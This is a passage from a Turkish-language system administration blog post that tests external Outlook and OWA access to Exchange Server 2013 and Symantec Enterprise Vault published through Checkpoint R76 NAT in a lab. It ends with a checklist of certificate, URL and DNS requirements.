Yapılandırma sonucu üstte görüldüğü gibi. İstemci, şirket network’ünün dışından Office Outlook ile arşivine bakmak isterse bu URL kullanılacak!

Test

Hazırladığım test lab’ına göre ( daha önce ifade etmiştim ) , şirket network’üm 172.20.1.0/24 ip bloğundadır.

Test için kullandığım Windows 7 client 192.168.1.0/24 ( Checkpoint’e göre dış dünya ) ip bloğundadır. 192.168.1.0/24 ve 192.168.2.0/24 ip blokları arasında Routing mevcuttur.

clip_image028

Üstte görüldüğü üzere MS Office Outlook 2010, https üzerinden exchange organizasyonundaki ilgili mailbox’a bağlandı.

Server Name’e dikkat çekmek istiyorum. AutoDiscover kaydının önemi görünüyor diye düşünüyorum.

clip_image030

MS Office Outlook üstte görüldüğü üzere arşive bakılmak istendiğinde daha önce ayarlanan isme yani https://vaultexternal.e-vault.info/enterprisevault ismine gidiyor.

clip_image032

Sertifikanın içinde geçen SAN altında vaultexternal.e-vault.info ismi olmadığından ( daha önce bahsettiğim üzere ) uyarı alındı. “Yes” ile devam edebiliriz.

clip_image034

 

Erişim sağlandı.

clip_image036

Enterprise Vault’un Index servisi de çalışıyor. Office Mail App ile OWA üzerinden de erişim sağlandığını gözleyebiliriz.

clip_image038

Enterprise Vault Mail App’inin view,search,archive explorer vb. özelliklerinden faydalanabilir durumdayız.

Office Mail App ile ilgili ayarlara Exchange Server 2013 sunucularınızın birinden EMS’den get-app cmdlet’i ile bakabilirsiniz.

Örnek :

get-app –mailbox baris

get-app -mailbox baris | ?{$_.displayname -like “Enterprise Vault”} | fl

 

Checkpoint SmartView Tracker’dan log’lara bakabiliriz.(Malumunuz, erişim sağlandığına göre NAT’ın çalışmış olması gerekirJ)

clip_image040

Aynı source’dan ( windows 7 client’tan ) Checkpoint’in iki ayrı interface’ine paket gelmiş.

clip_image042

Source’un yani windows 7 client’ın talebine göre, gelen istekler Checkpoint tarafından Exchange Server’a ve Enterprise Vault Server’a doğru translate edilmiş. ( Bakınız XlateDst kolonu, üstte )

Sonuç

Lab ortamında, Exchange Server 2013 CAS hizmetlerini ve arşivlenmiş mailbox’lara erişim için Enterprise Vault web servisini Checkpoint R76’ın kullanımına sunulan iki adet external ip ile dış dünyaya açmış olduk.Dikkat edilmesi gereken kısımları tekrar ifade edelim.

-          Exchange Server 2013 CAS için geçerli bir otoriteden alınmış SSL sertifikası

-          External Domain Name

-          Enterprise Vault için Outlook Anywhere ( RPC over HTTP/S ) ile bağlanan istemcilerin kullanacağı URL

-          Enterprise Vault web servisi için geçerli bir otoriteden alınmış SSL sertifikası

-          Kullanılan tüm URL’lerin Name-to-IP mapping’lerinin yapılmış olması ( DNS!)

 

Herkese sorunsuz ve neşeli günler dilerim.

Viewing all 105 articles
Browse latest View live